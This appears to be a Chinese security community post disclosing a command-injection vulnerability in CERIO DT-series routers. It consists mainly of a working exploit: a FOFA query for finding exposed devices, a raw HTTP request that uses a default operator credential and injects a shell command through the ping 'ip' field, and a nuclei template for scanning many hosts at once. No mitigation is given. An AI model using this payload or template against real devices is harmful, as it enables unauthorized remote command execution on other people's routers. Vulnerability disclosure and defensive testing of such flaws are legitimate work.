CERIO DT系列路由器 存在命令执行漏洞
原创
1、fofa语句
title="DT-100G-N" || title="DT-300N" || title="DT-100G" || title="AMR-3204G" || title="WMR-200N"2、数据包
POST /cgi-bin/Save.cgi?cgi=PING HTTP/1.1
Host: 127.0.0.1
Authorization: Basic b3BlcmF0b3I6MTIzNA==
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 33
pid=2061&ip=127.0.0.1;id×=13、复现截图
4、nuclei POC
基本命令: nuclei.exe -l 网址文件.txt -t POC.yaml
id: CERIODT
info:
name: CERIO DT命令执行
author: someone
severity: high
metadata:
fofa-query: title="DT-100G-N" || title="DT-300N" || title="DT-100G" || title="AMR-3204G" || title="WMR-200N"
http:
- raw:
- |
POST /cgi-bin/Save.cgi?cgi=PING HTTP/1.1
Host: {{Hostname}}
Authorization: Basic b3BlcmF0b3I6MTIzNA==
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 33
pid=2061&ip=127.0.0.1;id×=1
matchers:
- type: dsl
dsl:
- status_code==200 && contains_all(body,"root")
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
评论
登录后参与评论
推荐阅读
腾讯云开发者
